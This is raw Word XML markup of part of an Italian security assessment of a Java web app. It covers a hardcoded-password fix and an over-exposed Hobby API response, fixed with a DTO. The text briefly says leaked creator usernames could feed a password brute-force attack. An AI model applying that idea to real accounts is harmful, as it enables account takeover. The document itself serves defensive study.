    <w:p w14:paraId="21391D83" w14:textId="510E4E87" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F76978" w14:textId="65823A2E" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6462C34B" w14:textId="1F52C89E" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F257A8" w14:textId="6C3CC60E" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A38701D" w14:textId="10627CCA" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFFCBF5" w14:textId="3DD57B74" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611DAB58" w14:textId="5C8E7483" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251942912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C884495" wp14:editId="60189FE0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8763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E58C93A" w14:textId="5BC19825"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>11</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495" id="_x0000_s1036" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:6.9pt;width:397.5pt;height:.05pt;z-index:25194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TQ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9NPtfEE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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5E58C93A" w14:textId="5BC19825"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>11</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserServiceTest.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E54C4F" w14:textId="259C907F" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218A3EED" w14:textId="1492BDF7" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25966B96" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358"/>
    <w:p w14:paraId="4D377D78" w14:textId="2BBA4FDC" w:rsidR="00B63358" w:rsidRPr="00ED7083" w:rsidRDefault="00DA7D75" w:rsidP="00B63358">
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidR="00ED7083" w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758173B" w14:textId="2635646B" w:rsidR="00DA7D75" w:rsidRDefault="00B63358" w:rsidP="00743C4B">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r w:rsidR="00DA7D75" w:rsidRPr="00B63358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PasswordManager</w:t>
      </w:r>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w:t>
      </w:r>
      <w:r w:rsidR="00777E6A">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In tal modo le password rimangono protette e non sono accessibili con il codice sorgente pubblico</w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t xml:space="preserve"> come si può notare in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00777E6A">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E0838" w14:textId="083F9CBF" w:rsidR="00DA7D75" w:rsidRDefault="00777E6A" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251944960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45C1280B" wp14:editId="0B6CF0DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>128905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5848350" cy="4446584"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1249033180"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446584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5496FA" w14:textId="4F158943" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE28D2C" w14:textId="2F364B47" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72247083" w14:textId="3A6B62CD" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39606C53" w14:textId="5AC518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786636BC"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044EB659" w:rsidR="00DA7D75" w:rsidRDefault="00777E6A"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5AB6251C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>90805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6475095" cy="635"/>
                <wp:effectExtent l="0" t="0" r="1905"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4727F417"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>12</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37" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7.15pt;width:50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6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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="65EF5949" w14:textId="4727F417"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>12</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserControllerTest.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3CC21" w14:textId="0D82BD3F" w:rsidR="00DA7D75" w:rsidRDefault="00777E6A" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251943936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B6A54B9" wp14:editId="6BA2C33F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>120015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4905375" cy="3124776"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2026095845"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124776"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E86BA" w14:textId="58E1D3FE" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E987B5" w14:textId="1BD65865" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6730D08D" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459D1C29" w14:textId="0067144F" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A26BE5C" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFD519E" w14:textId="709A91D1" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A042A0A" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1528D5C6" w14:textId="365D4C7C" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70446EF4" w14:textId="197E3B52" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100111F3" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507EB69A" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEA8100" w14:textId="4A8A5308" w:rsidR="006B3EEC" w:rsidRDefault="00777E6A" w:rsidP="00777E6A">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4729350">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>70231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1C8A9002"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>13</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38" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:55.3pt;width:365.0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SS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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1FF21143" w14:textId="1C8A9002"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>13</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: PasswordManager.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D14415" w14:textId="145D7EFB" w:rsidR="003A418E" w:rsidRPr="00ED7083" w:rsidRDefault="00553627" w:rsidP="00ED7083">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unexpected property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70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DBA01" w14:textId="41400056" w:rsidR="000F4F60" w:rsidRDefault="000F4F60" w:rsidP="00CE3F28">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>La vulnerabilità risulta vera perché vengono mandati in rete delle informazioni non necessarie riguardo gli Hobby come category, creator e location</w:t>
      </w:r>
      <w:r w:rsidR="00A83B5D">
        <w:t>, come visibile in Figura 1</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A83B5D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:t>Esse infatti non vengono mostrate dal front-end agli utenti. Di conseguenza il loro invio è superfluo.</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In questo caso l’exploit consiste nel leggere i campi non necessari e usarli per altri possibili attacchi. Ad esempio il nome del creatore, che coincide con il suo username, può essere utilizzato per rubare il suo account, facendo un attacco brute force sulla password.</w:t>
      </w:r>
      <w:r w:rsidR="006F4082">
        <w:t xml:space="preserve"> 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429D6A72"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r w:rsidR="004514D2" w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getHobbyDetails()</w:t>
      </w:r>
      <w:r w:rsidR="004514D2">
        <w:t xml:space="preserve"> in modo tale da non restituire i campi dell’oggetto Hobby che non vengono utilizzati. Per fare ciò è stata introdotta la classe HobbyResponseDTO che è depurata dai campi inutilizzati</w:t>
      </w:r>
      <w:r>
        <w:t>, come mostrato in Figura 1</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764A4F1" w14:textId="1922AF19" w:rsidR="00D930D6" w:rsidRDefault="00D930D6" w:rsidP="00A83B5D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="105F3BA9" wp14:editId="62A40F72">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4699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565ADC00" w14:textId="1100DB79" w:rsidR="00D930D6" w:rsidRDefault="00D930D6" w:rsidP="00A83B5D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED62CB1" w14:textId="7F208788" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08112798" w14:textId="7989B6D1" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075A4DBA" w14:textId="06447FCA" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F8DE8E" w14:textId="5D30D485" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732E7A69" w14:textId="3021C26A" w:rsidR="00D930D6" w:rsidRDefault="00D930D6"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7A901BFB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>233680</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57970EAE"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4</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39" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:18.4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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2DD5C29B" w14:textId="57970EAE"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4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Hobby con campi non necessari</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FCEEA" w14:textId="7A3C725E" w:rsidR="00D930D6" w:rsidRDefault="00015CE5" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252020736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11C767D7" wp14:editId="3A8DBA5E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7006590" cy="1775460"/>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966"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="700659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0E4D" w14:textId="1D44FA20" w:rsidR="00D930D6" w:rsidRDefault="00D930D6" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560260BD" w14:textId="0A22A62A" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D774663" w14:textId="7E44829A" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E42BA3B" w14:textId="360FFC71" w:rsidR="00093E39" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251780096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="369379B7" wp14:editId="239468A6">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31FF48D4"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5</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0"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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5E89BB1C" w14:textId="31FF48D4"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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Hobby senza i campi inutili</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3761B5AE" w14:textId="613B0FD3" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A42E57" w14:textId="4025C6D6" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B81DDC5" w14:textId="19716B0F" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6269708B" w14:textId="3AE10019" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DD55CE" w14:textId="7F29883F" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B18835D" w14:textId="2948BB1F" w:rsidR="00A83B5D" w:rsidRDefault="00777E6A" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251945984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="571F2C17" wp14:editId="1B772DDF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6595110" cy="778487"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapNone/>
            <wp:docPr id="245913537"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5110" cy="778487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A83B5D">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4BD63B8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6</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1"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GQIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L05SLFu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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="357CC040" w14:textId="4BD63B8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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java con vulnerabilità</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAE8F4" w14:textId="110DBC21" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5F0330" w14:textId="4B1297C6" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D39F0A" w14:textId="3E8B7710" w:rsidR="003A418E" w:rsidRDefault="00D930D6" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251947008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C762D58" wp14:editId="07636DC5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-556895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6731000" cy="945204"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="112971627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0" cy="94520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01CF58F6" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4DC133" w14:textId="688F1B87" w:rsidR="00093E39" w:rsidRDefault="00D930D6" w:rsidP="00D930D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251784192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A5B2ACE" wp14:editId="528F8FDE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
